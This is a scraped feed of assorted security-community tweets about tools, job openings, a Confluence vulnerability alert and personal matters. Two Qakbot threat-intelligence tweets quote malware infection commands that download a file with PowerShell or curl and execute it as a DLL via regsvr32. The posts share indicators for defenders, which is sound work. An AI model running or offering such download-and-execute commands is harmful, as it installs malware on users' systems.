CORS exists to restrict and prevent loading resources from “bad” places but there exists tons of other mechanisms to bypass this security feature and it’s labeled as “intended”. INFURIATING.

🪵🐚🐚🐚🐚 - testing bypasses ignore this tweet.

Evening y'all! Small update to #feroxbuster: can now add scans from the interactive menu, in addition to cancelling them. Also, added an original_url field to the json output. Docs/demo of the new menu: epi052.github.io/feroxbuster-do…

I have a lot of respect for this, and know many parents can relate.

I'm excited to announce I'll be joining the flock for my DoD SkillBridge transition at Red Canary, a Zscaler company!

#Qakbot - AA - url > .zip > .lnk > .ps > .dll powershell.exe iwr hxxps://green-a-thon.com/LosZkUvr/B.png -OutFile $env:TEMP\file172.dll;Start-Process regsvr32 $env:TEMP\file172.dll bazaar.abuse.ch/sample/7b265f0… IOC's github.com/pr0xylife/Qakb…

Dashboards are an overrated analyst benefit. Data ingest, normalization, availability and orchestration/automation are far more important. Focusing on the data will allow analysts to make higher quality assessments, faster.

Burning through all my Spotify playlists was not something I had considered when switching to remote work. Anyone have any favorite Spotify playlists? I enjoy just about every music genre. #remoteworking

So… never? What the.

We just posted about an unauthenticated RCE that works on all current version of Atlassian Confluence. There is no patch or work around available at this time. This is 10/10 on the badness scale. Get your servers off the internet now! We have seen active exploitation. #dfir

Today was a good day.

#Qakbot - obama188 - .html > .zip > .lnk > .dll HTML smuggling again no .img MD C:\ProgramData\Pterds curl.exe -o C:\ProgramData\Pterds\HErtop.pos 185.141.26.]251/%random%.dat regsvr32 C:\ProgramData\Pterds\HErtop.pos bazaar.abuse.ch/sample/5e973f1… IOC's github.com/pr0xylife/Qakb…

So...I've just realeased the most redicious project I think I've ever made... Security Information and Event Monitoring experience (SIEM) in Minecraft, with the ability to respond to and kill malicious processes [1/4] github.com/pathtofile/sie…

Last night my gym was destroyed very likely by an ex-member who was kicked out for some VERY poor behavior. It’s a shame doing the right thing has consequences. I hope justice finds this dude quick.

Marc Smeets Detection engineering - build / maintain / improve pipelines or systems to get logs into something that can be used for detection Threat Detection - use those logs to write (high signal) detections and probably respond

Age limits for people in power seems smart

The final ride for @cowboycerrone 👋 #UFC276

I’m hiring a Senior Security Engineer for my Threat Detections team at Amazon. Desired Locations are Austin, Arlington, Seattle but other Amazon Corporate office locations could be possible. The in-office time is flexible. Please DM me with any questions! amazon.jobs/en/jobs/237688…